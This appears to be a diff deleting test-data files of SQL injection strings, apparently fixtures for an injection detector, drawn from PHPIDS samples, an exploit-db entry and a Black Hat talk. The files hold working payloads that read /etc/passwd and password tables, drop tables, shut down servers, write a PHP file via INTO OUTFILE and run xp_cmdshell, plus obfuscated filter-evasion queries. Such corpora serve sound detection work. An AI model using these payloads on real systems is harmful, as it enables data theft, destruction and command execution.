@a mod (1) or 1 union select load_file('/etc/passwd'),credit_card,passwd from users-- -
|
||||
|
||||
# HT @LightOS
|
||||
# issue here is how '1gfsdg..' is processed.
|
||||
# MySQL parses it as a single word, other databases treat it as "1", "gfs..."
|
||||
-1 procedure analyse(1gfsdgfds, sfg) union select table_name from information_schema.tables limit 1
|
||||
|
||||
# HT @FluxReiners
|
||||
(select 1 foo) union select load_file('foo');
|
||||
|
||||
#
|
||||
# Anonymous from Research Institution of Telecom in Beijing, China
|
||||
# commenting out since i have no idea how this could be a true SQL injection
|
||||
#=1 union select admin,pass from admin limit 1
|
||||
#=1 union select 1,2,3,4,5,6
|
||||
|
||||
# problems with type-casting, and nested type casting
|
||||
#
|
||||
# credit: Reto Ischi
|
||||
#
|
||||
's' || binary(1)# and n='foo"
|
||||
1 - binary (1 - binary(1)) UNION SELECT 2 --
|
||||
1 - binary (binary(1) -1) UNION SELECT 2 --
|
||||
binary (1 - binary(1)) UNION SELECT 2 --
|
||||
binary (binary(1) - 1) UNION SELECT 2 --
|
||||
binary (binary(1)) UNION SELECT 2 --
|
||||
|
||||
#
|
||||
# Padding using between operator
|
||||
#
|
||||
(1 between @version and "2") & 1 UNION SELECT 1
|
||||
(1 between @version and @user) & 1 UNION SELECT 1
|
||||
(1 between 1 and @version) & 1 UNION SELECT 1
|
||||
(1 between '1' and @version) & 1 UNION SELECT 1
|
||||
(1 between 1 and 2) & 1 UNION SELECT 1
|
||||
(1 between '1' and '2') & 1 UNION SELECT 1
|
||||
(1 between 1 and '2') & 1 UNION SELECT 1
|
||||
(1 between '1' and 2) & 1 UNION SELECT 1
|
||||
('1' between '1' and '2') & 1 UNION SELECT 1
|
||||
(@version between '1' and '2') & 1 UNION SELECT 1
|
||||
(@version between 1 and '2') & 1 UNION SELECT 1
|
||||
|
||||
#
|
||||
# ANY and SOME subqueries
|
||||
#
|
||||
1 - ANY(SELECT 1,2)
|
||||
ANY(SELECT 1) - 1 UNION ALL --
|
||||
ANY(SELECT (1)) - 1 UNION ALL --
|
||||
ANY((SELECT 1)) - 1 UNION ALL --
|
||||
1 - ANY(SELECT 1) UNION ALL --
|
||||
|
||||
#
|
||||
# embedded %A0 mysql
|
||||
#
|
||||
1%A0UNION%A0SELECT%A02--
|
||||
1%00UNION%00SELECT%002--
|
||||
|
||||
#
|
||||
# http://www.exploit-db.com/exploits/28854/
|
||||
#
|
||||
stringindatasetchoosen%25' and 1 = any (select 1 from SECURE.CONF_SECURE_MEMBERS where FULL_NAME like '%25dministrator' and rownum<=1 and PASSWORD like '0%25') and '1%25'='1
|
||||
|
||||
#
|
||||
# Thanks to @rsalgado
|
||||
# A degenerate MySQL ODBC case
|
||||
#
|
||||
-{``.``.id} union select table_name FROM information_schema.tables LIMIT 1
|
|
@ -1,132 +0,0 @@
|
|||
# mysql implicit conversions tests
|
||||
A' AND 'B
|
||||
A 'AND' B
|
||||
'AND'
|
||||
' AND '
|
||||
A' && 'B
|
||||
A '&&' B
|
||||
'&&'
|
||||
' && '
|
||||
A' = 'B
|
||||
A '=' B
|
||||
'='
|
||||
' = '
|
||||
A' & 'B
|
||||
A '&' B
|
||||
'&'
|
||||
' & '
|
||||
A' | 'B
|
||||
A '|' B
|
||||
'|'
|
||||
' | '
|
||||
A' ^ 'B
|
||||
A '^' B
|
||||
'^'
|
||||
' ^ '
|
||||
A' DIV 'B
|
||||
A 'DIV' B
|
||||
'DIV'
|
||||
' DIV '
|
||||
A' / 'B
|
||||
A '/' B
|
||||
'/'
|
||||
' / '
|
||||
A' <=> 'B
|
||||
A '<=>' B
|
||||
'<=>'
|
||||
' <=> '
|
||||
A' >= 'B
|
||||
A '>=' B
|
||||
'>='
|
||||
' >= '
|
||||
A' > 'B
|
||||
A '>' B
|
||||
'>'
|
||||
' > '
|
||||
A' << 'B
|
||||
A '<<' B
|
||||
'<<'
|
||||
' << '
|
||||
A' <= 'B
|
||||
A '<=' B
|
||||
'<='
|
||||
' <= '
|
||||
A' < 'B
|
||||
A '<' B
|
||||
'<'
|
||||
' < '
|
||||
A' LIKE 'B
|
||||
|
||||
# common false positive
|
||||
#A 'LIKE' B
|
||||
#'LIKE'
|
||||
#' LIKE '
|
||||
|
||||
A' - 'B
|
||||
A '-' B
|
||||
'-'
|
||||
' - '
|
||||
A' %25 'B
|
||||
A '%25' B
|
||||
'%25'
|
||||
' %25 '
|
||||
A' MOD 'B
|
||||
A 'MOD' B
|
||||
'MOD'
|
||||
' MOD '
|
||||
A' != 'B
|
||||
A '!=' B
|
||||
'!='
|
||||
' != '
|
||||
A' <> 'B
|
||||
A '<>' B
|
||||
'<>'
|
||||
' <> '
|
||||
A' NOT LIKE 'B
|
||||
A 'NOT LIKE' B
|
||||
'NOT LIKE'
|
||||
' NOT LIKE '
|
||||
A' NOT REGEXP 'B
|
||||
A 'NOT REGEXP' B
|
||||
'NOT REGEXP'
|
||||
' NOT REGEXP '
|
||||
A' OR 'B
|
||||
A 'OR' B
|
||||
'OR'
|
||||
' OR '
|
||||
A' || 'B
|
||||
A '||' B
|
||||
'||'
|
||||
' || '
|
||||
A' %2B 'B
|
||||
A '%2B' B
|
||||
'%2B'
|
||||
' %2B '
|
||||
A' REGEXP 'B
|
||||
A 'REGEXP' B
|
||||
'REGEXP'
|
||||
' REGEXP '
|
||||
A' >> 'B
|
||||
A '>>' B
|
||||
'>>'
|
||||
' >> '
|
||||
A' RLIKE 'B
|
||||
A 'RLIKE' B
|
||||
'RLIKE'
|
||||
' RLIKE '
|
||||
A' NOT RLIKE 'B
|
||||
A 'NOT RLIKE' B
|
||||
'NOT RLIKE'
|
||||
' NOT RLIKE '
|
||||
A' SOUNDS LIKE 'B
|
||||
A 'SOUNDS LIKE' B
|
||||
'SOUNDS LIKE'
|
||||
' SOUNDS LIKE '
|
||||
A' * 'B
|
||||
A '*' B
|
||||
'*'
|
||||
' * '
|
||||
A' XOR 'B
|
||||
A 'XOR' B
|
||||
'XOR'
|
||||
' XOR '
|
|
@ -1,275 +0,0 @@
|
|||
#
|
||||
# Various samples from PHPIDS
|
||||
#
|
||||
%22+OR+1%3D1%23
|
||||
%3B+DROP+table+Users+--
|
||||
admin%27--
|
||||
SELECT+%2F%2A%2132302+1%2F0%2C+%2A%2F+1+FROM+tablename
|
||||
10%3BDROP+members+--
|
||||
SELECT+CHAR%280x66%29
|
||||
SELECT+LOAD_FILE%280x633A5C626F6F742E696E69%29
|
||||
EXEC%28%40stored_proc+%40param%29
|
||||
chr%2811%29%7C%7Cchr%2812%29%7C%7Cchar%2813%29
|
||||
1+or+name+like+%27%25%27
|
||||
1+OR+%271%27%21%3D0
|
||||
1+OR+ASCII%282%29+%3D+ASCII%282%29
|
||||
1%27+OR+1%26%221
|
||||
1%27+OR+%271%27+XOR+%270
|
||||
1+OR%2B1%3D1
|
||||
1+OR%2B%281%29%3D%281%29
|
||||
aaa%27+or+%281%29%3D%281%29+%23%21asd
|
||||
aaa%27+OR+%281%29+IS+NOT+NULL+%23%21asd
|
||||
a%27+or+1%3D%271
|
||||
asd%27+union+%28select+username%2Cpassword+from+admins%29+where+id%3D%271
|
||||
1%27%3B+WAITFOR+TIME+%2717%3A48%3A00+%27+shutdown+--+-a
|
||||
1%27%3B+anything%3A+goto+anything+--+-a
|
||||
%27+%3D%2B+%27
|
||||
asd%27+%3D-+%28-%27asd%27%29+--+-a
|
||||
aa%22in%2B+%28%22aa%22%29+or+-1+%21%3D+%220
|
||||
aa%22+%3D%2B+-+%220++
|
||||
aa%27+LIKE+0+--+-a
|
||||
aa%27+LIKE+md5%281%29+or+%271
|
||||
aa%27+REGEXP-+md5%281%29+or+%271
|
||||
aa%27+DIV%401+%3D+0+or+%271
|
||||
aa%27+XOR-+column+%21%3D+-%270
|
||||
union+select+password+from+users+where+1
|
||||
str%27%3Dversion%28%29%0A%09%09%09%09%09%09UNION%23%0A%09%09%09%09%09%09%23%0A%09%09%09%09%09%09%23%0A%09%09%09%09%09%09%23%0A%09%09%09%09%09%09SELECT+group_concat%28table_name%29%23%0A%09%09%09%09%09%09%23%23%0A%09%09%09%09%09%09%2F%2A%21FROM%2A%2F+information_schema.tables+WHERE+%271
|
||||
asd%22or-1%3D%22-1
|
||||
asd%22or%211%3D%22%211
|
||||
asd%22or%21%281%29%3D%221
|
||||
asd%22or%401%3D%22%401
|
||||
asd%22or-1+XOR%220
|
||||
asd%22+or+ascii%281%29%3D%2249
|
||||
asd%22+or+md5%281%29%5E%221
|
||||
asd%22+or+table.column%5E%221
|
||||
asd%22+or+%40%40version%5E%220
|
||||
asd%22+or+%40%40global.hot_cache.key_buffer_size%5E%221
|
||||
1%22OR%21%22a
|
||||
1%22OR%21%220
|
||||
1%22OR-%221
|
||||
1%22OR%40%221%22+IS+NULL+%231+%21+%28with+unfiltered+comment+by+tx+%3B%29
|
||||
1%22OR%21%28false%29+%231+%21
|
||||
1%22OR-%28true%29+%23a+%21
|
||||
1%22+INTO+OUTFILE+%22C%3A%2Fwebserver%2Fwww%2Freadme.php
|
||||
asd%27+or+md5%285%29%5E%271+
|
||||
asd%27+or+column%5E%27-1+
|
||||
asd%27+or+true+--+a
|
||||
%5C%22asd%22+or+1%3D%221
|
||||
a+1%27+or+if%28-1%3D-1%2Ctrue%2Cfalse%29%23%21
|
||||
aa%5C%5C%22aaa%27+or+%271
|
||||
%27+or+id%3D+1+having+1+%231+%21
|
||||
%27+or+id%3D+2-1+having+1+%231+%21
|
||||
aa%27or+null+is+null+%23%28
|
||||
aa%27or+current_user%21%3D%27+1
|
||||
aa%27or+BINARY+1%3D+%271
|
||||
aa%27or+LOCALTIME%21%3D%270
|
||||
aa%27like-%27aa
|
||||
aa%27is%5CN%7C%21%27
|
||||
%27is%5CN-%21%27
|
||||
asd%27%7Ccolumn%26%26%271
|
||||
asd%27%7Ccolumn%21%3D%27
|
||||
aa%27or+column%3Dcolumn+--+%23aa
|
||||
aa%27or+column%2Acolumn%21%3D%270
|
||||
aa%27or+column+like+column+--+%23a
|
||||
0%27%2Acolumn+is+%5CN+-+%271
|
||||
1%27%2Acolumn+is+%5CN+or+%271
|
||||
1%27%2A%40a+is+%5CN+-+%27
|
||||
1%27%2A%40a+is+%5CN+or+%271
|
||||
1%27+-1+or%2B1%3D+%27%2B1+
|
||||
1%27+-1+-+column+or+%271+
|
||||
1%27+-1+or+%271
|
||||
+%281%29or%281%29%3D%281%29+
|
||||
fo%22o%27or%271
|
||||
%27+OR+UserID+IS+NOT+2
|
||||
%27+OR+UserID+IS+NOT+NULL
|
||||
%27+OR+UserID+%3E+1
|
||||
%27++OR+UserID+RLIKE++%27.%2B%27+
|
||||
%27OR+UserID+%3C%3E+2
|
||||
1%27+union+%28select+password+from+users%29+--+-a
|
||||
1%27+union+%28select%271%27%2C%272%27%2Cpassword+from+users%29+--+-a
|
||||
1%27+union+all+%28select%271%27%2Cpassword+from+users%29+--+-a
|
||||
aa%27%21%3D%271
|
||||
aa%27%21%3D%7E%271
|
||||
aa%27%3D%28%27aa%27%29%23%28
|
||||
aa%27%7C%2B%271
|
||||
aa%27%7C%21%27aa
|
||||
aa%27%5E%21%27aa+
|
||||
abc%27+%3D+%21%21%270
|
||||
abc%27+%3D+%21%21%21%21%270
|
||||
abc%27+%3D+%21%21%21%21%21%21%21%21%21%21%21%21%21%21%270
|
||||
abc%27+%3D+%210+%3D+%21%21%270
|
||||
abc%27+%3D+%210+%21%3D+%21%21%21%270
|
||||
abc%27+%3D+%21%2B0+%21%3D+%21%270+
|
||||
aa%27%3D%2B%271
|
||||
%27%3Bif+1%3D1+drop+database+test--+-a
|
||||
%27%3Bif+1%3D1+drop+table+users--+-a
|
||||
%27%3Bif+1%3D1+shutdown--+-a
|
||||
%27%3B+while+1%3D1+shutdown--+-a
|
||||
%27%3B+begin+shutdown+end--+-a+
|
||||
%27%2BCOALESCE%28%27admin%27%29+and+1+%3D+%211+div+1%2B%27
|
||||
%27%2BCOALESCE%28%27admin%27%29+and+%40%40version+%3D+%211+div+1%2B%27
|
||||
%27%2BCOALESCE%28%27admin%27%29+and+%40%40version+%3D+%21%40%40version+div+%40%40version%2B%27
|
||||
%27%2BCOALESCE%28%27admin%27%29+and+1+%3D%2B1+%3D+%21true+div+%40%40version%2B%27
|
||||
foo%27div+count%28select%60pass%60from%28users%29where+mid%28pass%2C1%2C1%29rlike+lower%28conv%2810%2Cpi%28%29%2Api%28%29%2Cpi%28%29%2Api%28%29%29%29+%29-%270
|
||||
1-%23canvas%0A++++++++++++++++++++++++%28SELECT+1%2A1+from%28information_schema.tables%29+group+by+table_name+having+-+left%28hex%28table_name%29%2Ctrue%29+%3D+-7%29
|
||||
str%23%27+UNION+SELECT+group_concat%28table_name%29%0A++++++++++++++++++++++++FROM%60information_schema%60.tables
|
||||
aa%27in+%280%29%23%28
|
||||
aa%27%21%3Dascii%281%29%23%28
|
||||
%27+or+SOUNDEX+%281%29+%21%3D+%270
|
||||
aa%27RLIKE+BINARY+0%23%28
|
||||
aa%27or+column%21%3D%271
|
||||
aa%27or+column+DIV+0+%3D0+%23
|
||||
aa%27or+column%2B%281%29%3D%271
|
||||
aa%27or+0%21%3D%270
|
||||
aa%27LIKE%270
|
||||
aa%27or+id+%3D%27%5C%27
|
||||
1%27%3Bdeclare+%40%23+int%3Bshutdown%3Bset+%40%23+%3D+%271
|
||||
1%27%3Bdeclare+%40%40+int%3Bshutdown%3Bset+%40%40+%3D+%271
|
||||
asd%27+or+column%26%26%271
|
||||
asd%27+or+column%3D+%211+and%2B1%3D%271
|
||||
aa%27%21%3Dascii%281%29+or-1%3D-%271
|
||||
a%27IS+NOT+NULL+or%2B1%3D%2B%271
|
||||
aa%27in%28%27aa%27%29+or-1%21%3D%270
|
||||
aa%27+or+column%3D%2B%211+%231
|
||||
aa%27+SOUNDS+like%2B%271
|
||||
aa%27+REGEXP%2B%270
|
||||
aa%27+like%2B%270
|
||||
-1%27%3D-%27%2B1
|
||||
%27%3D%2B%27
|
||||
aa%27+or+stringcolumn%3D+%2B%211+%231+
|
||||
aa%27+or+anycolumn+%5E+-%271
|
||||
aa%27+or+intcolumn+%26%26+%271
|
||||
asd%27+or+column%26%26%271
|
||||
asd%27+or+column%3D+%211+and%2B1%3D%271
|
||||
aa%27+or+column%3D%2B%211+%231
|
||||
aa%27IS+NOT+NULL+or%2B1%5E%2B%270
|
||||
aa%27IS+NOT+NULL+or+%2B1-1+xor%270
|
||||
aa%27IS+NOT+NULL+or%2B2-1-1-1+%21%3D%270
|
||||
aa%27%7C1%2B1%3D%282%29Or%281%29%3D%271
|
||||
aa%27%7C3%21%3D%274
|
||||
aa%27%7Cascii%281%29%2B1%21%3D%271
|
||||
aa%27%7CLOCALTIME%2A0%21%3D%271+
|
||||
asd%27+%7C1+%21%3D+%281%29%23aa
|
||||
%27+is+99999+%3D+%27
|
||||
%27+is+0.00000000000+%3D+%27
|
||||
1%27%2Acolumn-0-%270
|
||||
1%27-%40a+or%271
|
||||
a%27-%40a%3D%40a+or%271
|
||||
aa%27+%2A%40var+or+1+SOUNDS+LIKE+%281%29%7C%271
|
||||
aa%27+%2A%40var+or+1+RLIKE+%281%29%7C%271+
|
||||
a%27+or%7Ecolumn+like+%7E1%7C%271
|
||||
%27%3C%7E%27
|
||||
a%27-1.and+%271
|
||||
aa%27%2F1+DIV+1+or%2B1%3D%2B%271+
|
||||
aa%27%260%2B1%3D%27aa
|
||||
aa%27+like%280%29+%2B+1--+-a+
|
||||
aa%27%5E0%2B0%3D%270
|
||||
aa%27%5E0%2B0%2B1-1%3D%280%29--+-a
|
||||
aa%27%3C3%2B1+or%2B1%3D%2B%271
|
||||
aa%27%251%2B0%3D%270
|
||||
%27%2F1%2F1%3D%27
|
||||
+aa%27%2F1+or+%271
|
||||
+aa1%27+%2A+%40a+or+%271+%27%2F1+regexp+%270
|
||||
+%27+%2F+1+%2F+1+%3D%27
|
||||
+%27%2F1%3D%27
|
||||
+aa%27%260%2B1+%3D+%27aa
|
||||
+aa%27%26%2B1%3D%27aa
|
||||
+aa%27%26%281%29%3D%27aa
|
||||
+aa%27%5E0%2B0+%3D+%270
|
||||
+aa%27%5E0%2B0%2B1-1+%3D+%280%29--+-a
|
||||
+aa%27%5E%2B-3+or%271
|
||||
+aa%27%5E0%21%3D%271
|
||||
+aa%27%5E%280%29%3D%270
|
||||
+aa%27+%3C+%283%29+or+%271
|
||||
+aa%27+%3C%3C3+or%271
|
||||
+aa%27-%2B%211+or+%271
|
||||
+aa%27-%211+like%270
|
||||
+aa%27+%25+1+or+%271
|
||||
+aa%27+%2F+%271%27+%3C+%273
|
||||
+aa%27+%2F+%2B1+%3C+%273
|
||||
+aa%27+-+%2B+%21+2+%21%3D+%2B+-+%271
|
||||
+aa%27+-+%2B+%21+1+or+%271
|
||||
+aa%27+%2F+%2B1+like+%270
|
||||
+%27+%2F+%2B+%281%29+%2F+%2B+%281%29+%3D%27
|
||||
+aa%27+%26+%2B%280%29-%281%29%3D%27aa
|
||||
+aa%27+%5E%2B+-%280%29+%2B+-%280%29+%3D+%270
|
||||
+aa%27+%5E+%2B+-+3+or+%271
|
||||
+aa%27+%5E+%2B0%21%3D%271
|
||||
+aa%27+%3C+%2B3+or+%271
|
||||
+aa%27+%25+%2B1+or+%271
|
||||
aa%27or+column%2A0+like%270
|
||||
aa%27or+column%2A0%3D%270
|
||||
aa%27or+current_date%2A0
|
||||
1%27%2Fcolumn+is+not+null+-+%27+
|
||||
1%27%2Acolumn+is+not+%5CN+-+%27+
|
||||
1%27%5Ecolumn+is+not+null+-+%27+
|
||||
aa%27+is+0+or+%271
|
||||
%27+or+MATCH+username+AGAINST+%28%27%2Badmin+-a%27+IN+BOOLEAN+MODE%29%3B+--+-a
|
||||
%27+or+MATCH+username+AGAINST+%28%27a%2A+-%29+-%2B+%27+IN+BOOLEAN+MODE%29%3B+--+-a
|
||||
1%27%2A%40a+or+%271
|
||||
1%27%2Anull+or+%271
|
||||
1%27%2AUTC_TIME+or+%271
|
||||
1%27%2Anull+is+null+-+%27
|
||||
1%27%2A%40a+is+null+-+%27
|
||||
1%27%2A%40%40version%2A-0%2520%3D%2520%270
|
||||
1%27%2Acurrent_date+rlike%270
|
||||
aa%27%2Fcurrent_date+in+%280%29+--+-a
|
||||
aa%27+%2F+current_date+regexp+%270
|
||||
aa%27+%2F+current_date+%21%3D+%271
|
||||
1%27+or+current_date%2A-0+rlike%271
|
||||
0%27+%2F+current_date+XOR+%271
|
||||
%27or+not+false+%23aa
|
||||
1%27+%2A+id+-+%270
|
||||
1%27+%2Aid-%270
|
||||
asd%27%3B+shutdown%3B+
|
||||
asd%27%3B+select+null%2Cpassword%2Cnull+from+users%3B+
|
||||
aa+aa%27%3B+DECLARE+tablecursor+CURSOR+FOR+select+a.name+as+c%2Cb.name+as+d%2C%28null%29from+sysobjects+a%2Csyscolumns+b+where+a.id%3Db.id+and+a.xtype+%3D+%28+%27u%27+%29+and+current_user+%3D+current_user+OPEN+tablecursor+
|
||||
aa+aa%27%3B+DECLARE+tablecursor+CURSOR+FOR+select+a.name+as+c%2Cb.name+as+d%2C%28null%29from+sysobjects+a%2Csyscolumns+b%0A++++++++++++++++++++++++where+a.id%3Db.id+and+a.xtype+%3D+%28+%27u%27+%29+and+current_user+%3D+current_user%0A++++++++++++++++++++++++OPEN+tablecursor+FETCH+NEXT+FROM+tablecursor+INTO+%40a%2C%40b+WHILE%28%40a+%21%3D+null%29%0A++++++++++++++++++++++++%40query++%3D+null%2Bnull%2Bnull%2Bnull%2B+%27+UPDATE+%27%2Bnull%2B%40a%2Bnull%2B+%27+SET+id%3Dnull%2C%40b+%3D+%40payload%27%0A++++++++++++++++++++++++BEGIN+EXEC+sp_executesql+%40query%0A++++++++++++++++++++++++FETCH+NEXT+FROM+tablecursor+INTO+%40a%2C%40b+END%0A++++++++++++++++++++++++CLOSE+tablecursor+DEALLOCATE+tablecursor%3B%0A++++++++++++++++++++++++and+some+text%2C+to+get+pass+the+centrifuge%3B+and+some+more+text.
|
||||
%40query++%3D+null%2Bnull%2Bnull%2B+%27+UPDATE+%27%2Bnull%2B%40a%2B+%27+SET%5B++%27%2Bnull%2B%40b%2B+%27+%5D++%3D+%40payload%27
|
||||
asd%27+union+distinct%28select+null%2Cpassword%2Cnull+from+users%29--a+
|
||||
asd%27+union+distinct+%28+select+null%2Cpassword%2C%28null%29from+user+%29--+a+
|
||||
# double encoded
|
||||
## DECLARE%2520%40S%2520CHAR%284000%29%3BSET%2520%40S%3DCAST%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%2520AS%2520CHAR%284000%29%29%3BEXEC%28%40S%29%3B
|
||||
DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(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%20AS%20CHAR(4000));EXEC(@S);
|
||||
## asaa%27%3BSELECT%5Basd%5DFROM%5Basd%5D
|
||||
## asd%27%3B+select+%5Bcolumn%5D+from+users+
|
||||
0x31+union+select+%40%40version%2Cusername%2Cpassword+from+users+
|
||||
1+order+by+if%281%3C2+%2Cuname%2Cuid%29+
|
||||
1+order+by+ifnull%28null%2Cuserid%29+
|
||||
2%27+between+1+and+3+or+0x61+like+%27a
|
||||
4%27+MOD+2+like+%270
|
||||
-1%27+%2FID+having+1%3C+1+and+1+like+1%2F%271+
|
||||
2%27+%2F+0x62+or+0+like+binary+%270
|
||||
0%27+between+2-1+and+4-1+or+1+sounds+like+binary+%271+
|
||||
-1%27+union+%28%28select+%28select+user%29%2C%28select+password%29%2C1%2F1+from+mysql.user%29%29+order+by+%271+
|
||||
-1%27+or+substring%28null%2Fnull%2C1%2Fnull%2C1%29+or+%271
|
||||
1%27+and+1+%3D+hex%28null-1+or+1%29+or+1+%2F%27null+
|
||||
AND+CONNECTION_ID%28%29%3DCONNECTION_ID%28%29
|
||||
AND+ISNULL%281%2F0%29
|
||||
MID%28%40%40hostname%2C+1%2C+1%29
|
||||
CHARSET%28CURRENT_USER%28%29%29
|
||||
DATABASE%28%29+LIKE+SCHEMA%28%29
|
||||
COERCIBILITY%28USER%28%29%29
|
||||
1%27+and+0x1abc+like+0x88+or+%270
|
||||
%27-1-0+union+select+%28select+%60table_name%60+from+%60information_schema%60.tables+limit+1%29+and+%271
|
||||
null%27%27null%27+find_in_set%28uname%2C+%27lightos%27+%29+and+%271
|
||||
%28case-1+when+mid%28load_file%280x61616161%29%2C12%2C+1%2F+1%29like+0x61+then+1+else+0+end%29+
|
||||
%27sounds+like%281%29+union%19%28select%191%2Cgroup_concat%28table_name%29%2C3%19from%19information_schema.%60tables%60%29%23%28
|
||||
0%27+%271%27+like+%280%29+and+1+sounds+like+a+or+true%231
|
||||
+0%27rlike%280%29and+1+rlike+%28%40a%29or+true+-+%27+0+
|
||||
2a%27-1%5E+%27+0%27+and+%28select+mid%28user%2C1+%2F1%2C1%2F+1%29from%60mysql%60.user+limit+1%29+rlike+%27r
|
||||
+A%27+sounds+like%28select+case%281%3D1%29when%271%27then%27A%27end%29+and+%271
|
||||
1%27+and+0x31%3D%271+
|
||||
1%27+and+0x05%3D%28select+0-+-mid%28version%28%29%2F-+-1%2C+1%2C1%29+as+%27a%27+from+dual%29+and+%271+
|
||||
%27AND+1.-1LIKE.1+EXEC+xp_cmdshell+%27dir+
|
||||
|
||||
# skipping
|
||||
#SELECT+1%2C2%2C0xEF%60
|
||||
#SELECT+1%2C2%2C3%60abc%60%60
|
||||
|
||||
1%27AND%23%0A++++++++++++++++++++++++0%23%0A++++++++++++++++++++++++UNION%23%0A++++++++++++++++++++++++SELECT%40a%3A%3Dtable_name+FROM%23%0A++++++++++++++++++++++++information_schema.tables+LIMIT+1%23
|
||||
1%27+and+0x43+%3D+%28select+all+mid%28table_name%2C+1%2C1%29as%27a%27from+%60information_schema%60.tables+limit+1%29+and+%271%0A++++++++++++++++++++++++%27AND+1.-1LIKE.1+INSERT+INTO+TMP_DB+EXEC+%22xp_cmdshell%22%27dir
|
||||
1%27+AND+0x35+%3D+%28SELECT+%40phpids%3A%3DMID%28%40%40version+FROM+1+FOR+1%29+FROM+dual%29+and+%271+
|
||||
null%27+or+%40%3A%3D%28select+all+user%27%27+from+mysql+.+user+limit+1%29+union%23%0A++++++++++++++++++++++++%23%0A++++++++++++++++++++++++select+%40%27
|
||||
1%27and+%23%0A++++++++++++++++++++++++%23aa%0A++++++++++++++++++++++++0+union%23%0A++++++++++++++++++++++++%23bb%0A++++++++++++++++++++++++select+version%28%29%60
|
||||
1%27and+%23%0A++++++++++++++++++++++++%23aa%0A++++++++++++++++++++++++0+union%23%0A++++++++++++++++++++++++%23bb%0A++++++++++++++++++++++++select+%28select+%60user%60+from%23%0A++++++++++++++++++++++++%23cc%0A++++++++++++++++++++++++mysql.user+limit+1%29%27
|
|
@ -1,151 +0,0 @@
|
|||
#
|
||||
# from
|
||||
# Roberto Salgado
|
||||
# SQLi Optimization and Obfuscation Techniques
|
||||
# Black Hat USA 2013
|
||||
#
|
||||
|
||||
#
|
||||
# Slide 47 - Optimizing Queries MSSQL
|
||||
# (note: slightly reworked to put in SQLi format)
|
||||
#
|
||||
1 UNION SELECT table_name + ', ' FROM information_schema.tables FOR XML PATH('')
|
||||
|
||||
#
|
||||
# Slide 48 - Optimizing Queries Oracle
|
||||
# (note: slightly reworked to put in SQLi format)
|
||||
#
|
||||
1 UNION SELECT RTRIM(XMLAGG(XMLELEMENT(e, table_name || ',')).EXTRACT('//text()').EXTRACT('//text()') ,',') FROM all_tables
|
||||
|
||||
#
|
||||
# Slide 49 - Optimizing Queries PSQL
|
||||
# (note: slightly reworked to put in SQLi format)
|
||||
#
|
||||
1 UNION SELECT array_to_json(array_agg(tables))::text FROM (SELECT schemaname, relname FROM pg_stat_user_tables) AS tables LIMIT 1
|
||||
|
||||
#
|
||||
# Slide 50 - Optimizing Queries MSSQL
|
||||
#
|
||||
IF EXISTS (SELECT 1 FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME='TMP_DB') DROP TABLE TMP_DB DECLARE @a varchar(8000) IF EXISTS(SELECT * FROM dbo.sysobjects WHERE id = object_id (N'[dbo].[xp_cmdshell]') AND OBJECTPROPERTY (id, N'IsExtendedProc') = 1) BEGIN CREATE TABLE %23xp_cmdshell (name nvarchar(11), min int, max int, config_value int, run_value int) INSERT %23xp_cmdshell EXEC master..sp_configure 'xp_cmdshell' IF EXISTS (SELECT * FROM %23xp_cmdshell WHERE config_value=1)BEGIN CREATE TABLE %23Data (dir varchar(8000)) INSERT %23Data EXEC master..xp_cmdshell 'dir' SELECT @a='' SELECT @a=Replace(@a%2B'<br></font><font color="black">'%2Bdir,'<dir>','</font><font color="orange">') FROM %23Data WHERE dir>@a DROP TABLE %23Data END ELSE SELECT @a='xp_cmdshell not enabled' DROP TABLE %23xp_cmdshell END ELSE SELECT @a='xp_cmdshell not found' SELECT @a AS tbl INTO TMP_DB--
|
||||
|
||||
#
|
||||
# Slide 54 - Optimizing Queries - More Single Liners
|
||||
# (
|
||||
1 OR 1#"OR"'OR''='"="'OR''='
|
||||
|
||||
#
|
||||
# Slide 55
|
||||
#
|
||||
1 OR 1#"OR"'OR''='"="'OR''='
|
||||
|
||||
#
|
||||
# Slide 61
|
||||
#
|
||||
1!=0--+"!="'!='
|
||||
|
||||
#
|
||||
# Slide 64 How to confuse an Admin
|
||||
#
|
||||
1 UNION select@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO $ fRom(SeLEct@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO frOM`information_schema`.`triggers`)0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO WHere !FAlSE||tRue&&FalSe||FalsE&&TrUE like TruE||FalSE union/*!98765select@000OO0O0OooOoO0OOoooOOoOooo0o0o:=grOup_cONcaT(`username`)``from(users)whErE(username)like'admin'limit 1*/select@000OO0O0OooOoO0OOoooO0oOooo0o0o limit 1,0 UnION SeleCt(selEct(sELecT/*!67890sELect@000OO0O0O0oOoO0OOoooOOoOooo0o0o:=group_concat(`table_name`)FrOM information_schema.statistics WhERE TABLe_SCHEmA In(database())*//*!@000OO0O0OooOoO0OOoooO0oOooo0o0o:=gROup_conCat(/*!taBLe_naME)*/fRoM information_schema.partitions where TABLe_SCHEma not in(concat((select insert(insert((select (collation_name)from(information_schema.collations)where(id)=true+true),true,floor(pi()),trim(version()from(@@version))),floor(pi()),ceil(pi()*pi()),space(0))), conv((125364/(true-!true))-42351, ceil(pi()*pi()),floor(pow(pi(),pi()))),mid(aes_decrypt(aes_encrypt(0x6175746F6D6174696F6E,0x4C696768744F53),0x4C696768744F53)FROM floor(version()) FOR ceil(version())),rpad(reverse(lpad(collation(user()),ceil(pi())--@@log_bin,0x00)),! 
!true,0x00),CHAR((ceil(pi())+!false)*ceil((pi()+ceil(pi()))*pi()),(ceil(pi()*pi())*ceil(pi()*pi()))--cos(pi()),(ceil(pi()*pi())*ceil(pi()*pi()))--ceil(pi()),(ceil(pi()*pi())*ceil(pi()*pi()))-cos(pi()),(ceil(pi()*pi())*ceil(pi()*pi()))--floor(pi()*pi()),(ceil(pi()*pi())*ceil(pi()*pi()))-floor(pi()))),0x6d7973716c))from(select--(select~0x7))0o0oOOO0Oo0OOooOooOoO00Oooo0o0oO)from(select@/*!/*!$*/from(select+3.``)000oOOO0Oo0OOooOooOoO00Oooo0o0oO)0o0oOOO0Oo0OOooOooOoO00Oooo0o0oO/*!76799sElect@000OO0O0OooOoO00Oooo0OoOooo0o0o:=group_concat(`user`)``from`mysql.user`WHeRe(user)=0x726f6f74*/#(SeLECT@ uNioN sElEcT AlL group_concat(cOLumN_nAME,1,1)FroM InFoRMaTioN_ScHemA.COLUMNS where taBle_scHema not in(0x696e666f726d6174696f6e5f736368656d61,0x6d7973716c)UNION 